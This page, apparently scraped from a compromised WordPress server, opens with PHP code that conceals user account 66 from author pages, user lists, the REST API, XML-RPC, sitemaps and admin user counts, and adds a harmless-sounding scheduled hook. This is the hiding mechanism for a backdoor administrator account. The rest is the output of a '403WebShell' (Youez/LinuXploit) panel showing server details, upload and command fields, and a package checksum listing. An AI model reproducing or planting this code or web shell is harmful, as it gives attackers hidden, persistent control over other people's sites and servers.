add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/php8.4-common.md5sums
c4679adc6374b78b68b0327c0be95906  usr/lib/php/20240924/calendar.so
a098e98700d378c37773e594b40fa74c  usr/lib/php/20240924/ctype.so
487afca95cb1b06ca337e0e67fd3e73b  usr/lib/php/20240924/exif.so
2213f9abef12cc92d6ca15ef5f846d66  usr/lib/php/20240924/ffi.so
ef6922fc4a35d1da761598bea4a737be  usr/lib/php/20240924/fileinfo.so
98d853d2908d1551826db9b211e27c8d  usr/lib/php/20240924/ftp.so
31e8be970c354396caf85a0f6155f14c  usr/lib/php/20240924/gettext.so
a8fd60fa7cb0cc0acbcf864cecbdca15  usr/lib/php/20240924/iconv.so
0168a6b5337c8cce504d116f743ca633  usr/lib/php/20240924/pdo.so
250d5ceeeeb48fc75241726350087a62  usr/lib/php/20240924/phar.so
0dc680b39d18e7718d17c4e9e1b610da  usr/lib/php/20240924/posix.so
250a2bee82179a7193f53c5955173b17  usr/lib/php/20240924/shmop.so
73b768c75b2de5ca840e7e198707ee80  usr/lib/php/20240924/sockets.so
a9ee3c8d4e475f607a2742d5e0c78575  usr/lib/php/20240924/sysvmsg.so
a5c70d7c15607a6895494a6ede7df280  usr/lib/php/20240924/sysvsem.so
0b029dfc4bf0e2f09e8083da677ab0ea  usr/lib/php/20240924/sysvshm.so
10ec914529502358fd7ab857885b0629  usr/lib/php/20240924/tokenizer.so
01adec0a43942f9963391bba25e7d59d  usr/lib/php/8.4/php.ini-development
1db700325ee9fd60dc7b291a8865ca15  usr/lib/php/8.4/php.ini-production
d9941f3ce94d5c5e33a857a6fd434392  usr/lib/php/8.4/php.ini-production.cli
66b5f6b35300421054d4979cbc492779  usr/share/bug/php8.4-common/control
246fd9dd4ca0497c7effdd33b7821677  usr/share/bug/php8.4-common/script
054307d0e28284aaa88b13e811fb8fee  usr/share/doc/php8.4-common/EXTENSIONS.gz
25d1da74a9edeb5e8e644e73ffb2ef46  usr/share/doc/php8.4-common/NEWS.Debian.gz
59f79eb767652bf942b32b35d6762477  usr/share/doc/php8.4-common/README.Debian.gz
ce1877f2af8041f649289e662ea0e7b9  usr/share/doc/php8.4-common/README.Debian.security
ded4ca103b4695b8fe9407b205854d87  usr/share/doc/php8.4-common/README.md.gz
eff710fad2e39fd01c68831f07996881  usr/share/doc/php8.4-common/UPGRADING.INTERNALS.gz
eaa55f8660096f549175b372b9cd9f55  usr/share/doc/php8.4-common/UPGRADING.gz
8a20919ef55e49a9800d2c8c0e936e96  usr/share/doc/php8.4-common/changelog.Debian.gz
9b08243548a71fce7fba5c7c43a2cb5e  usr/share/doc/php8.4-common/changelog.gz
2600cbcf2de9f3c298485a6ac1972048  usr/share/doc/php8.4-common/copyright
5e51e1d5eaf354428b002fcf9de13fcf  usr/share/lintian/overrides/php8.4-common
0877786daf8479dd91be0f89f223a102  usr/share/php8.4-common/common/calendar.ini
72def1d4663c5350713006af725f21ae  usr/share/php8.4-common/common/ctype.ini
7b3bf6064e6bd1749e5f1a3dd56592b3  usr/share/php8.4-common/common/exif.ini
40c77aebbb04a3e8891ea3575eda55a5  usr/share/php8.4-common/common/ffi.ini
3eb68bf4e22faed68c673430081b1a08  usr/share/php8.4-common/common/fileinfo.ini
b245857286d2cff077355dd82086c950  usr/share/php8.4-common/common/ftp.ini
7dfbed71c04bbd15100e719b20b7c764  usr/share/php8.4-common/common/gettext.ini
f875ac0ca30dea610b2adc421b9e997e  usr/share/php8.4-common/common/iconv.ini
2bcf2cd02149a7b3118f9a8ed7cfe1b3  usr/share/php8.4-common/common/pdo.ini
9dafa1a822dd003107e1686818a191fd  usr/share/php8.4-common/common/phar.ini
0f55f144c06b074b7c0a498928001452  usr/share/php8.4-common/common/posix.ini
894f4d6c5c36f658499b941a02bbc9a7  usr/share/php8.4-common/common/shmop.ini
5c9f4598aa9e02021783e540fc023c66  usr/share/php8.4-common/common/sockets.ini
0ac70c35787ea579baefc56e36ea9c47  usr/share/php8.4-common/common/sysvmsg.ini
a4c2616a57351dc93cb36e1f41c63926  usr/share/php8.4-common/common/sysvsem.ini
46bf0b73759bfdd7fcf431ea42d03c2f  usr/share/php8.4-common/common/sysvshm.ini
cb36a25e9c9d2c975cb49bbb56f16465  usr/share/php8.4-common/common/tokenizer.ini

Youez - 2016 - github.com/yon3zu
LinuXploit